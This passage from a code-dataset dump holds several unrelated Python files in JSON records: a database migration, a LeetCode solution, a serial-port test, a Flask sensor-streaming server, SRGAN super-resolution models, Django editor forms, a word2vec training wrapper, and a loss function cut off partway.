sa.Column('nricHash', sa.String(length=128), nullable=True),\n sa.Column('points', sa.Integer(), nullable=True),\n sa.Column('passwordHash', sa.String(length=128), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)\n op.create_table('question',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('questionTitle', sa.Text(), nullable=False),\n sa.Column('questionOption', sa.Text(), nullable=False),\n sa.Column('userid', sa.Integer(), nullable=False),\n sa.Column('questionType', sa.String(length=64), nullable=False),\n sa.Column('dateTime', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['userid'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_question_dateTime'), 'question', ['dateTime'], unique=False)\n op.create_table('response',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user', sa.Integer(), nullable=False),\n sa.Column('question', sa.Integer(), nullable=False),\n sa.Column('response', sa.Text(), nullable=False),\n sa.Column('dateTime', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['question'], ['question.id'], ),\n sa.ForeignKeyConstraint(['user'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_index(op.f('ix_response_dateTime'), 'response', ['dateTime'], unique=False)\n op.create_index(op.f('ix_response_response'), 'response', ['response'], unique=False)\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index(op.f('ix_response_response'), table_name='response')\n op.drop_index(op.f('ix_response_dateTime'), table_name='response')\n op.drop_table('response')\n op.drop_index(op.f('ix_question_dateTime'), table_name='question')\n op.drop_table('question')\n op.drop_index(op.f('ix_user_username'), table_name='user')\n op.drop_table('user')\n # ### end Alembic commands ###\n","sub_path":"base/migrations/versions/87d6c4ba4e59_.py","file_name":"87d6c4ba4e59_.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"57006365","text":"class Solution:\n def longestSubarray(self, nums) -> int:\n n = len(nums)\n pre, suf = nums[::], nums[::]\n res = 0\n for i in range(1, n):\n pre[i] = 0 if nums[i] == 0 else pre[i - 1] + 1\n res = max(res, pre[i])\n for i in range(n - 2, -1, -1):\n suf[i] = 0 if nums[i] == 0 else suf[i + 1] + 1\n res = max(res, suf[i])\n if i > 0:\n res = max(res, suf[i + 1] + pre[i - 1])\n return res if res < n else n-1\n\n\ns = Solution()\nprint(s.longestSubarray([0, 1, 1, 1, 0, 1, 1, 0, 1]))\n","sub_path":"leetcode/2021/longest-subarray-of-1s-after-deleting-one-element.py","file_name":"longest-subarray-of-1s-after-deleting-one-element.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"437059579","text":"#Author:Bing Liu\r\n\r\nimport serial\r\nimport serial.tools.list_ports\r\nimport threading\r\nimport time\r\n\r\nclass MSerialPort:\r\n message = ''\r\n def __init__(self, port, buandRate=115000, timeOut=2):\r\n self.port = serial.Serial(port, buandRate, timeout=timeOut)\r\n if not self.port.isOpen():\r\n self.port.open()\r\n def portOpen(self):\r\n if not self.port.isOpen():\r\n self.port.open()\r\n def portClose(self):\r\n self.port.close()\r\n def sendData(self,data):\r\n number = self.port.write(data)\r\n return number\r\n def readData(self):\r\n while True:\r\n data = self.port.readline()\r\n self.message = data\r\n\r\nif __name__ == '__main__':\r\n mSerial = MSerialPort('COM3', 115000)\r\n threading.Thread(target=mSerial.readData).start()\r\n\r\n while True:\r\n time.sleep(3)\r\n mSerial.sendData('\\xA5\\x60'.encode())\r\n print(mSerial.message)\r\n mSerial.message = None\r\n print('next line')\r\n","sub_path":"Py-lidar data analysis - V1.0/SerialPortTest.py","file_name":"SerialPortTest.py","file_ext":"py","file_size_in_byte":1000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"412319970","text":"import threading\nimport time\n\nfrom Adafruit_BNO055 import BNO055\nfrom flask import *\nfrom influxdb import InfluxDBClient\n\nfrom car_information import CarInformation\nfrom influx_database_util import InfluxDatabaseUtil\n\nCALIBRATION_FILE = 'calibration.json'\n\nBNO_AXIS_REMAP = {'x': BNO055.AXIS_REMAP_X,\n 'y': BNO055.AXIS_REMAP_Z,\n 'z': BNO055.AXIS_REMAP_Y,\n 'x_sign': BNO055.AXIS_REMAP_POSITIVE,\n 'y_sign': BNO055.AXIS_REMAP_POSITIVE,\n 'z_sign': BNO055.AXIS_REMAP_NEGATIVE}\n\nBNO_UPDATE_FREQ_HZ = 5\n\nbno = BNO055.BNO055(serial_port='/dev/ttyAMA0', rst=18)\n\nbno_changed = threading.Condition()\n\nbno_data = {}\n\nRECORDING = False\nREPLAY = False\n\napp = Flask(__name__)\n\n\ndef start_sensor_thread():\n # Start the BNO thread right before the first request is served. This is\n # necessary because in debug mode flask will start multiple main threads so\n # this is the only spot to put code that can only run once after starting.\n # See this SO question for more context:\n # http://stackoverflow.com/questions/24617795/starting-thread-while-running-flask-with-debug\n global bno_thread\n # Initialize BNO055 sensor.\n if not bno.begin():\n raise RuntimeError('Failed to initialize BNO055!')\n bno.set_axis_remap(**BNO_AXIS_REMAP)\n # Kick off BNO055 reading thread.\n bno_thread = threading.Thread(target=read_sensor)\n bno_thread.daemon = True # Don't let the BNO reading thread block exiting.\n bno_thread.start()\n\n\nbno_thread = None\n\n\ndef read_sensor():\n \"\"\"Function to read the BNO sensor and update the bno_data object with the\n latest BNO orientation, etc. state. Must be run in its own thread because\n it will never return!\n \"\"\"\n # bno = None\n while True:\n global RECORDING\n global REPLAY\n # Grab new BNO sensor readings.\n temp = bno.read_temp()\n heading, roll, pitch = bno.read_euler()\n x, y, z, w = bno.read_quaternion()\n sys, gyro, accel, mag = bno.get_calibration_status()\n status, self_test, error = bno.get_system_status(run_self_test=False)\n acceleration = bno.read_accelerometer()\n\n data = {'heading': heading, 'roll': roll, 'pitch': pitch, 'temp': str(temp),\n 'quatX': x, 'quatY': y, 'quatZ': z, 'quatW': w,\n }\n\n if error != 0:\n print('Error! Value: {0}'.format(error))\n # Capture the lock on the bno_changed condition so the bno_data shared\n # state can be updated.\n\n with bno_changed:\n bno_data['euler'] = (heading, roll, pitch)\n bno_data['temp'] = temp\n bno_data['quaternion'] = (x, y, z, w)\n bno_data['acceleration'] = acceleration\n bno_data['calibration'] = (sys, gyro, accel, mag)\n # Notify any waiting threads that the BNO state has been updated.\n if RECORDING:\n client = InfluxDatabaseUtil.get_client()\n client.write_points([{\"measurement\": \"sensor_data\",\n \"fields\": data}])\n bno_changed.notifyAll()\n # Sleep until the next reading.\n time.sleep(1.0 / BNO_UPDATE_FREQ_HZ)\n\n\ndef present_sensor_data():\n while True:\n # Capture the bno_changed condition lock and then wait for it to notify\n # a new reading is available.\n global REPLAY\n with bno_changed:\n bno_changed.wait()\n if not REPLAY:\n heading, roll, pitch = bno_data['euler']\n temp = bno_data['temp']\n x, y, z, w = bno_data['quaternion']\n sys, gyro, accel, mag = bno_data['calibration']\n acceleration = bno_data['acceleration']\n # Send the data to the connected client in HTML5 server sent event format.\n data = {'heading': heading, 'roll': roll, 'pitch': pitch, 'temp': temp,\n 'quatX': x, 'quatY': y, 'quatZ': z, 'quatW': w, 'acceleration': acceleration}\n\n yield 'data: {0}\\n\\n'.format(json.dumps(data))\n\n\n@app.route('/replay')\ndef start_replay():\n global RECORDING\n global REPLAY\n RECORDING = False\n REPLAY = True\n client = InfluxDatabaseUtil.get_client()\n results = client.query('select * from sensor_data;')\n json_results = []\n for result in results:\n for res in result:\n json_results.append(json.dumps(res))\n\n final_final_results = '\\'data\\': {0}\\n\\n'.format(json_results)\n\n return Response(final_final_results, mimetype='text/json')\n\n\n@app.route(\"/record\", methods=['POST'])\ndef record():\n client = InfluxDatabaseUtil.get_client()\n client.drop_database('ems')\n client.create_database('ems')\n global RECORDING\n global REPLAY\n RECORDING = True\n REPLAY = False\n return 'OK'\n\n\n@app.route(\"/stop_record\", methods=['POST'])\ndef stop_record():\n global RECORDING\n global REPLAY\n RECORDING = False\n REPLAY = False\n return 'OK'\n\n\n@app.before_first_request\ndef init():\n start_sensor_thread()\n\n\n@app.route('/bno')\ndef bno_path():\n # Return SSE response and call bno_sse function to stream sensor data to\n # the webpage.\n return Response(present_sensor_data(), mimetype='text/event-stream')\n\n\n# Will simulate a request to an open API at Transportstyrelsen.\n@app.route('/carInformation', methods=['GET'])\ndef carInformation():\n return CarInformation.getCarInformation()\n\n\n@app.route(\"/\")\ndef root():\n return render_template(\"index.html\")\n\n\nif __name__ == '__main__':\n # Create a server listening for external connections on the default\n # port 5000. Enable debug mode for better error messages and live\n # reloading of the server on changes. Also make the server threaded\n # so multiple connections can be processed at once (very important\n # for using server sent events).\n app.run(host='0.0.0.0', debug=True, threaded=True)\n","sub_path":"ems_server.py","file_name":"ems_server.py","file_ext":"py","file_size_in_byte":5952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"129861527","text":"import helpers\nimport torch\nimport torch.nn as nn\nimport torchvision.models as mod\nfrom torchvision import transforms\nfrom numpy import log2\nfrom PIL import Image\n\n\nclass SRGAN():\n def __init__(self, args):\n self.args = args\n\n self.generator = SRGAN_Generator(args)\n if args.gen == \"\":\n self.generator.apply(helpers.weights_init)\n else:\n self.generator.load_state_dict(torch.load(args.gen))\n\n if args.mode == \"train\":\n self.discriminator = SRGAN_Discriminator(args)\n if args.disc == \"\":\n self.discriminator.apply(helpers.weights_init)\n else:\n self.discriminator.load_state_dict(torch.load(args.disc))\n\n self.adversarial_loss = nn.BCELoss()\n\n if args.content_loss == \"mse\":\n self.content_loss = nn.MSELoss()\n elif args.content_loss == \"l1\":\n self.content_loss = nn.L1Loss()\n elif args.content_loss == \"vgg\":\n self.content_loss = Vgg54Loss()\n else:\n raise NotImplementedError(\"Chosen content loss function not yet implemented\")\n\n self.gen_opt = torch.optim.Adam(self.generator.parameters(), lr=args.lr)\n self.disc_opt = torch.optim.Adam(self.discriminator.parameters(), lr=args.lr)\n self.labels = torch.autograd.Variable(torch.FloatTensor(args.batch_size), requires_grad=False)\n else:\n self.generator.eval()\n\n def anneal_lr(self, val=10):\n self.args.lr /= val\n self.gen_opt = torch.optim.Adam(self.generator.parameters(), lr=self.args.lr)\n self.disc_opt = torch.optim.Adam(self.discriminator.parameters(), lr=self.args.lr)\n\n def train_on_batch(self, epoch, num_epochs, batch_num, num_batches, hr_imgs, lr_imgs):\n if self.args.mode == \"train\":\n if self.args.use_cuda:\n hr_imgs = hr_imgs.cuda(device_id=self.args.device_id)\n lr_imgs = lr_imgs.cuda(device_id=self.args.device_id)\n\n #train discriminator\n self.discriminator.zero_grad()\n self.labels.data.resize_(hr_imgs.size(0), 1).fill_(1)\n output = self.discriminator(hr_imgs)\n loss_d1 = self.adversarial_loss(output, self.labels)\n loss_d1.backward()\n\n self.labels.data.resize_(lr_imgs.size(0), 1).fill_(0)\n sr_imgs = self.generator(lr_imgs)\n output = self.discriminator(sr_imgs.detach())\n loss_d2 = self.adversarial_loss(output, self.labels)\n loss_d2.backward()\n self.disc_opt.step()\n\n #train generator\n self.generator.zero_grad()\n self.labels.data.fill_(1)\n output = self.discriminator(sr_imgs)\n loss_g = self.content_loss(sr_imgs, hr_imgs) + \\\n self.args.adv_weight * self.adversarial_loss(output, self.labels)\n loss_g.backward()\n self.gen_opt.step()\n\n print(\"[%d/%d][%d/%d] Loss_Gen: %.4f Real_Loss_Disc: %.4f, Fake_Loss_Disc: %.4f\"\n % (epoch, num_epochs, batch_num + 1, num_batches, loss_g.data[0], loss_d1.data[0], loss_d2.data[0]))\n else:\n raise ValueError(\"SRGAN not declared in train mode\")\n\n def super_resolve(self, lr_img):\n if self.args.mode == \"test\":\n if self.args.use_cuda:\n lr_img = lr_img.cuda(device_id=self.args.device_id)\n\n return self.generator(lr_img).cpu() if lr_img.is_cuda else self.generator(lr_img)\n else:\n raise ValueError(\"SRGAN not declared in test mode\")\n\n def save_test_image(self):\n to_pil = transforms.ToPILImage()\n to_tensor = transforms.ToTensor()\n\n lr_img = to_tensor(Image.open(\"./Set5/image_SRF_4/img_003_SRF_4_LR.png\")).unsqueeze(0)\n lr_img = torch.autograd.Variable(lr_img, volatile=True)\n\n if self.args.use_cuda:\n lr_img = lr_img.cuda(device_id=self.args.device_id)\n\n sr_img = self.generator(lr_img)\n\n if self.args.use_cuda:\n sr_img = sr_img.cpu()\n\n sr_img = to_pil(sr_img.data[0].clamp(min=0, max=1))\n sr_img.save(\"%s/sr_img.png\" % self.args.out_folder)\n\n def save_models(self):\n self.generator.cpu()\n self.discriminator.cpu()\n torch.save(self.generator.state_dict(), \"%s/generator_weights.pth\" % self.args.out_folder)\n torch.save(self.discriminator.state_dict(), \"%s/discriminator_weights.pth\" % self.args.out_folder)\n self.generator.cuda(device_id=self.args.device_id)\n self.discriminator.cuda(device_id=self.args.device_id)\n\n def to_cuda(self):\n self.generator.cuda(device_id=self.args.device_id)\n\n if self.args.mode == \"train\":\n self.discriminator.cuda(device_id=self.args.device_id)\n self.labels = self.labels.cuda(device_id=self.args.device_id)\n self.adversarial_loss.cuda(device_id=self.args.device_id)\n self.content_loss.cuda(device_id=self.args.device_id)\n\n\nclass SRResNet():\n def __init__(self, args):\n self.args = args\n\n self.model = SRGAN_Generator(args)\n if args.model == \"\":\n self.model.apply(helpers.weights_init)\n else:\n self.model.load_state_dict(torch.load(args.model))\n\n if args.mode == \"train\":\n if args.content_loss == \"mse\":\n self.content_loss = nn.MSELoss()\n elif args.content_loss == \"l1\":\n self.content_loss = nn.L1Loss()\n elif args.content_loss == \"vgg\":\n self.content_loss = Vgg22WithTotalVariation(args.tv_weight)\n else:\n raise NotImplementedError(\"Chosen content loss function not yet implemented\")\n\n self.opt = torch.optim.Adam(self.model.parameters(), lr=args.lr)\n else:\n self.model.eval()\n\n def train_on_batch(self, epoch, num_epochs, batch_num, num_batches, hr_imgs, lr_imgs):\n if self.args.mode == \"train\":\n if self.args.use_cuda:\n hr_imgs = hr_imgs.cuda(device_id=self.args.device_id)\n lr_imgs = lr_imgs.cuda(device_id=self.args.device_id)\n\n self.model.zero_grad()\n sr_imgs = self.model(lr_imgs)\n loss = self.content_loss(sr_imgs, hr_imgs)\n loss.backward()\n self.opt.step()\n\n print(\"[%d/%d][%d/%d] Loss: %.4f\"\n % (epoch, num_epochs, batch_num + 1, num_batches, loss.data[0]))\n else:\n raise ValueError(\"SRResNet not declared in train mode\")\n\n def super_resolve(self, lr_img):\n if self.args.mode == \"test\":\n if self.args.use_cuda:\n lr_img = lr_img.cuda(device_id=self.args.device_id)\n\n return self.model(lr_img).cpu() if lr_img.is_cuda else self.model(lr_img)\n else:\n raise ValueError(\"SRResNet not declared in test mode\")\n\n def anneal_lr(self, val=10):\n self.args.lr /= val\n self.opt = torch.optim.Adam(self.model.parameters(), lr=self.args.lr)\n\n def save_test_image(self):\n to_pil = transforms.ToPILImage()\n to_tensor = transforms.ToTensor()\n\n lr_img = to_tensor(Image.open(\"./Set5/image_SRF_4/img_003_SRF_4_LR.png\")).unsqueeze(0)\n lr_img = torch.autograd.Variable(lr_img, volatile=True)\n\n if self.args.use_cuda:\n lr_img = lr_img.cuda(device_id=self.args.device_id)\n\n sr_img = self.model(lr_img)\n\n if self.args.use_cuda:\n sr_img = sr_img.cpu()\n\n sr_img = to_pil(sr_img.data[0].clamp(min=0, max=1))\n sr_img.save(\"%s/sr_img.png\" % self.args.out_folder)\n\n def save_model(self):\n self.model.cpu()\n torch.save(self.model.state_dict(), \"%s/srresnet_weights.pth\" % self.args. out_folder)\n self.model.cuda(device_id=self.args.device_id)\n\n def to_cuda(self):\n self.model.cuda(device_id=self.args.device_id)\n\n if self.args.mode == \"train\":\n self.content_loss.cuda(device_id=self.args.device_id)\n\n\nclass SRGAN_Generator(nn.Module):\n def __init__(self, args):\n super(SRGAN_Generator, self).__init__()\n\n sequence = [nn.Conv2d(3, 64, kernel_size=9, padding=4), nn.PReLU()]\n sequence += [GeneratorResidualSubnet()]\n\n num_shuffle_blocks = log2(args.upscale_factor)\n assert num_shuffle_blocks.is_integer(), \"Upscale factor should be a power of 2\"\n\n for i in range(int(num_shuffle_blocks)):\n sequence += [GeneratorPixelShuffleBlock()]\n\n sequence += [nn.Conv2d(64, 3, kernel_size=9, padding=4)]\n\n self.generator = nn.Sequential(*sequence)\n\n def forward(self, x):\n return self.generator(x)\n\nclass GeneratorPixelShuffleBlock(nn.Module):\n def __init__(self, num_filters=64):\n super(GeneratorPixelShuffleBlock, self).__init__()\n\n self.shuffle_block = nn.Sequential(\n nn.Conv2d(num_filters, num_filters * 4, kernel_size=3, padding=1),\n nn.PixelShuffle(2),\n nn.PReLU()\n )\n\n def forward(self, x):\n return self.shuffle_block(x)\n\nclass GeneratorResidualSubnet(nn.Module):\n def __init__(self, num_blocks=16, num_filters=64):\n super(GeneratorResidualSubnet, self).__init__()\n\n sequence = []\n\n for i in range(num_blocks):\n sequence += [GeneratorBlock(num_filters)]\n\n sequence += [nn.Conv2d(num_filters, num_filters, kernel_size=3, padding=1), nn.BatchNorm2d(num_filters)]\n\n self.subnet = nn.Sequential(*sequence)\n\n def forward(self, x):\n return x + self.subnet(x)\n\nclass GeneratorBlock(nn.Module):\n def __init__(self, num_filters):\n super(GeneratorBlock, self).__init__()\n\n self.block = nn.Sequential(\n nn.Conv2d(num_filters, num_filters, kernel_size=3, padding=1),\n nn.BatchNorm2d(num_filters),\n nn.PReLU(),\n nn.Conv2d(num_filters, num_filters, kernel_size=3, padding=1),\n nn.BatchNorm2d(num_filters)\n )\n\n def forward(self, x):\n return x + self.block(x)\n\n\nclass SRGAN_Discriminator(nn.Module):\n def __init__(self, args, num_filters=64):\n super(SRGAN_Discriminator, self).__init__()\n\n conv_sequence = [nn.Conv2d(3, 64, kernel_size=3, padding=1), nn.LeakyReLU(.2, inplace=True),\n DiscriminatorBlock(num_filters=num_filters, strided=True)]\n\n for i in range(3):\n num_filters *= 2\n conv_sequence += [DiscriminatorBlock(num_filters=num_filters, strided=False),\n DiscriminatorBlock(num_filters=num_filters, strided=True)]\n\n in_dim = ((args.crop_size / 16) ** 2) * num_filters * 2\n linear_sequence = [nn.Linear(in_dim, 1024), nn.LeakyReLU(.2, inplace=True),\n nn.Linear(1024, 1), nn.Sigmoid()]\n\n self.conv_subnet = nn.Sequential(*conv_sequence)\n self.linear_subnet = nn.Sequential(*linear_sequence)\n\n def forward(self, x):\n y = self.conv_subnet(x)\n y = y.view(y.size(0), -1)\n return self.linear_subnet(y)\n\nclass DiscriminatorBlock(nn.Module):\n def __init__(self, num_filters, strided):\n super(DiscriminatorBlock, self).__init__()\n\n if strided:\n self.block = nn.Sequential(\n nn.Conv2d(num_filters, num_filters * 2, kernel_size=3, stride=2, padding=1),\n nn.BatchNorm2d(num_filters * 2),\n nn.LeakyReLU(.2, inplace=True)\n )\n else:\n self.block = nn.Sequential(\n nn.Conv2d(num_filters, num_filters, kernel_size=3, padding=1),\n nn.BatchNorm2d(num_filters),\n nn.LeakyReLU(.2, inplace=True)\n )\n\n def forward(self, x):\n return self.block(x)\n\n\nclass Vgg54Loss(nn.Module):\n def __init__(self, rescaling_factor=12.75):\n super(Vgg54Loss, self).__init__()\n self.vgg = Vgg54()\n self.rescaling_factor = rescaling_factor\n\n def modified_euclidean_distance(self, x):\n (num_images, _, h, w) = x.size()\n return torch.sum(torch.pow(x, 2)).mul(1.0 / (num_images * w * h * self.rescaling_factor))\n\n def __call__(self, sr_imgs, hr_imgs):\n sr_feature_maps = self.vgg(sr_imgs)\n hr_feature_maps = self.vgg(hr_imgs).detach()\n return self.modified_euclidean_distance(sr_feature_maps - hr_feature_maps)\n\nclass Vgg54(nn.Module):\n def __init__(self, requires_grad=False):\n super(Vgg54, self).__init__()\n pretrained_model = mod.vgg19(pretrained=True)\n self.modified_pretrained = nn.Sequential(*list(pretrained_model.features.children())[:-1])\n\n for (_, layer) in self.modified_pretrained._modules.items():\n layer.requires_grad = requires_grad\n\n def forward(self, x):\n return self.modified_pretrained(x)\n\n\nclass Vgg22WithTotalVariation(nn.Module):\n def __init__(self, tv_weight):\n super(Vgg22WithTotalVariation, self).__init__()\n self.vgg_loss = Vgg22Loss()\n self.tv_loss = TotalVariationLoss(tv_weight)\n\n def __call__(self, sr_imgs, hr_imgs):\n return self.vgg_loss(sr_imgs, hr_imgs) + self.tv_loss(sr_imgs)\n\nclass Vgg22Loss(nn.Module):\n def __init__(self, rescaling_factor=12.75):\n super(Vgg22Loss, self).__init__()\n self.vgg = Vgg22()\n self.rescaling_factor = rescaling_factor\n\n def modified_euclidean_distance(self, x):\n (num_images, _, h, w) = x.size()\n return torch.sum(torch.pow(x, 2)).mul(1.0 / (num_images * w * h * self.rescaling_factor))\n\n def __call__(self, sr_imgs, hr_imgs):\n sr_feature_maps = self.vgg(sr_imgs)\n hr_feature_maps = self.vgg(hr_imgs).detach()\n return self.modified_euclidean_distance(sr_feature_maps - hr_feature_maps)\n\nclass Vgg22(nn.Module):\n def __init__(self, requires_grad=False):\n super(Vgg22, self).__init__()\n pretrained_model = mod.vgg19(pretrained=True)\n self.modified_pretrained = nn.Sequential(*list(pretrained_model.features.children())[:9])\n\n for (_, layer) in self.modified_pretrained._modules.items():\n layer.requires_grad = requires_grad\n\n def forward(self, x):\n return self.modified_pretrained(x)\n\nclass TotalVariationLoss(nn.Module):\n def __init__(self, tv_weight):\n super(TotalVariationLoss, self).__init__()\n self.tv_weight = tv_weight\n\n def __call__(self, imgs):\n pixel_diff1 = imgs[:, :, 1:, :] - imgs[:, :, :-1, :]\n pixel_diff2 = imgs[:, :, :, 1:] - imgs[:, :, :, :-1]\n return self.tv_weight * torch.sum(torch.abs(pixel_diff1)) + torch.sum(torch.abs(pixel_diff2))\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":14768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"335378811","text":"# -*- coding: utf-8 -*-\n\"\"\"\nForms\n\"\"\"\nfrom django import forms\n\nfrom django.utils.translation import ugettext\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.core.urlresolvers import reverse\n\nfrom djangocodemirror import settings_local\nfrom djangocodemirror.widgets import CodeMirrorWidget\nfrom djangocodemirror.fields import DjangoCodeMirrorField\n\nTHEME_CHOICES = [(v.split('/')[-1].split('.')[0], k) for k,v in settings_local.CODEMIRROR_THEMES]\n\n# Try import for parser\ntry:\n from rstview.parser import SourceReporter, map_parsing_errors\nexcept ImportError:\n # Dummy fallback\n def map_parsing_errors(error, *args, **kwargs):\n # Translators: Dummy error to return when no supported parser is installed\n return ugettext(\"Dummy\")\n def SourceReporter(source, *args, **kwargs):\n return []\n\n# Try import for django-crispy-forms\ntry:\n from crispy_forms.helper import FormHelper\n from crispy_forms.layout import Submit\nexcept ImportError:\n # Dummy fallback\n def get_form_helper():\n return None\nelse:\n def get_form_helper():\n helper = FormHelper()\n helper.form_action = '.'\n helper.form_style = 'inline'\n helper.add_input(Submit('submit', _('Save')))\n return helper\n\nclass DjangoCodeMirrorSampleForm(forms.Form):\n \"\"\"\n Sample form\n \"\"\"\n content = DjangoCodeMirrorField(label=u\"DjangoCodeMirror\", max_length=50000, required=True, config_name='djangocodemirror_sample_demo')\n \n def clean_content(self):\n \"\"\"\n Parse content to check eventual markup syntax errors and warnings\n \"\"\"\n content = self.cleaned_data.get(\"content\")\n if content:\n errors = SourceReporter(content)\n if errors:\n raise forms.ValidationError(map(map_parsing_errors, errors))\n return content\n \n def save(self, *args, **kwargs):\n return\n\nclass DjangoCodeMirrorSettingsForm(forms.Form):\n \"\"\"\n Editor settings form\n \"\"\"\n editor_settings_url = 'djangocodemirror-settings'\n \n theme = forms.ChoiceField(label=_('theme'), initial=settings_local.DJANGOCODEMIRROR_DEFAULT_THEME, choices=THEME_CHOICES, required=False, help_text=_(\"The theme to style the editor with.\"))\n lineWrapping = forms.BooleanField(label=_('line wrapping'), initial=True, required=False, help_text=_(\"Whether CodeMirror should scroll or wrap for long lines.\"))\n no_tab_char = forms.BooleanField(label=_('avoid tabulation'), initial=True, required=False, help_text=_(\"Disable usage of any tabulation character, instead each tabulation will be replaced by 4 space characters.\"))\n \n def __init__(self, *args, **kwargs):\n self.helper = get_form_helper()\n if self.helper is not None:\n self.helper.form_action = reverse(self.editor_settings_url)\n \n super(DjangoCodeMirrorSettingsForm, self).__init__(*args, **kwargs)\n \n def save(self, *args, **kwargs):\n no_tab_char = self.cleaned_data.get('no_tab_char')\n # Set the needed options to avoid tabulation character usage\n if no_tab_char:\n self.cleaned_data.update({\n \"indentUnit\": 4,\n \"tabSize\": 4,\n \"indentWithTabs\": False,\n })\n else:\n self.cleaned_data.update({\n \"indentWithTabs\": True,\n })\n return self.cleaned_data\n","sub_path":"djangocodemirror/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"38494268","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"train the word2vec model\n\ninput_file: 以 space/tab/eod 作为分词边界\n\"\"\"\n\nimport argparse\n\nimport pandas as pd\nimport numpy as np\nimport torchtext\nimport subprocess\nimport shlex\n\n\ndef main():\n\n parser = argparse.ArgumentParser(description='Train word2vec model.',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n required_group = parser.add_argument_group(\"required named arguments\")\n required_group.add_argument(\"--text-data-file\", \"-tdf\",\n help=\"use text data from to train the model, assuming tab/space/EOL spaced tokens\", required=True)\n parser.add_argument(\"--alpha\", default=0.025,\n help=\"Set the starting learning rate: 0.025 suggested for skip-gram; 0.05 suggested for CBOW\")\n parser.add_argument(\"--dim-embedding\", \"-dm\", help=\"set size of word vectors (dim of embedding)\", default=128)\n parser.add_argument(\"--iter\", \"-it\", default=5, help=\"Run more training iterations\", type=int)\n parser.add_argument(\"--cbow\", help=\"Use the continuous bag of words model: 0 ~ skip gram; 1 ~ CBOW\", default=1)\n parser.add_argument(\"--window-size\", \"-ws\", help=\"set max skip length between words\", default=5)\n parser.add_argument(\"--frequency-threshold\", \"-ft\",\n help=\"Set threshold for occurrence of words. Those that appear with higher frequency in the training data will be randomly down-sampled, useful range is (0, 1e-5)\", default=1e-3)\n parser.add_argument(\"--use-hierarchical-softmax\", \"-uhs\",\n help=\"Use Hierarchical Softmax, 0 not used; 1 use\", default=0)\n parser.add_argument(\"--number-negative\", \"-nn\",\n help=\"Number of negative examples, common values are 3 - 10 (0=not used)\", default=5)\n parser.add_argument(\"--threads\", default=12, help=\"Use threads\")\n parser.add_argument(\"--min-count\", default=3,\n help=\"This will discard words that appears less than times\")\n parser.add_argument(\"--output-clusters\", \"-oc\",\n help=\"number of output clusters: 0 ~ output word vectors, NO kmeans; >0 ~ nubmber of clusters in k-means\", default=0, type=int)\n parser.add_argument(\"--debug\", help=\"Set the debug mode: 2=more info during training\", default=2)\n parser.add_argument(\"--binary\", \"-b\",\n help=\"Save the resulting vectors in binary moded: 0 text; 1 binary; 2 both\", default=2, type=int)\n\n # parser.add_argument(\"--output-file\", \"-of\",\n # help=\"Use to save the resulting word vectors / word clusters\", default=\"/tmp/output\")\n # parser.add_argument(\"--save-vocab\", \"-sv\",\n # help=\"the vocabulary will be saved to . If not setting, save to `text_data_file.vocab`\", default=None)\n # parser.add_argument(\"--read-vocab\", \"-rv\",\n # help=\"The vocabulary will be read from , not constructed from the training data\")\n\n args = parser.parse_args()\n\n args.save_vocab = args.text_data_file.replace(\".txt\", \".vocab\")\n if args.output_clusters > 0:\n args.output_file = args.text_data_file.replace(\".txt\", \"_{:04d}.cluster.txt\".format(args.iter))\n else:\n if args.binary == 0:\n args.output_file = args.text_data_file.replace(\".txt\", \"_{:04d}.embedding.txt\".format(args.iter))\n elif args.binary == 1:\n args.output_file = args.text_data_file.replace(\".txt\", \"_{:04d}.embedding.bin\".format(args.iter))\n else:\n args.output_file = args.text_data_file.replace(\".txt\", \"_{:04d}.embedding.txt\".format(args.iter))\n\n cmd = \"../bin/word2vec -train {} -output {} -size {} -window {} -sample {} -hs {} -negative {} -threads {} -iter {} -min-count {} -classes {} -binary {} -save-vocab {} -cbow {} --alpha {}\".format(\n args.text_data_file, args.output_file, args.dim_embedding, args.window_size, args.frequency_threshold, args.use_hierarchical_softmax,\n args.number_negative, args.threads, args.iter, args.min_count, args.output_clusters, args.binary, args.save_vocab, args.cbow, args.alpha\n )\n print(cmd)\n subprocess.run(shlex.split(cmd))\n print(\"See {} for result\".format(args.output_file))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"242645039","text":"import torch\nimport torch.nn.functional as F\n\n\ndef two_step_loss(score, label):\n \"\"\" Separate the \"other\" label. Use a binary classifier to detect \"other\" label and another\n 18-way classifier to detect true labels.\n\n Args:\n true_label_score: tensor of shape (batch_size, 18)\n other_label_score: tensor of shape (batch_size, 2)\n label: (batch_size)\n\n Returns: loss\n\n \"\"\"\n true_label_score, other_label_score = score\n not_other = label != 18\n\n if torch.cuda.is_available():\n binary_loss = F.cross_entropy(other_label_score, not_other.type(torch.cuda.LongTensor))\n else:\n binary_loss = F.cross_entropy(other_label_score, not_other.type(torch.LongTensor))\n\n # for class loss, we only consider those which is not \"Other\"\n true_label_score_not_other = 